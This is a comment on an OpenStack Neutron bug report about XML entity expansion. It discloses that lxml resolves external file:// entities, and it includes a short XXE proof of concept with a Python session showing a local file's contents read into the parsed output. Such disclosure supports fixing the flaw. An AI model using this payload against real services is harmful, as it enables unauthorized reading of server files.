neutron

  1. Bug #1100282
  2. Comment #66

Comment 66 for bug 1100282

Revision history for this message
Christian Heimes (heimes) wrote : Re: DoS through XML entity expansion

Have you taken care of lxml, too? I just noticed that lxml always resolves and loads external entities with file:// URLs. An attacker can possibly load and retrieve all (XML) files that the service is allowed to access.

Example:

external_file.xml
==============
<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>

simple.xml
=========
<!-- comment -->
<root>
   <element key='value'>text</element>
   <element>text</element>tail
   <empty-element/>
</root>

>>> from lxml import etree
>>> tree = etree.parse("external_file.xml")
>>> print(etree.tostring(tree))
<root><!-- comment -->
<root>
   <element key="value">text</element>
   <element>text</element>tail
   <empty-element/>
</root>
</root>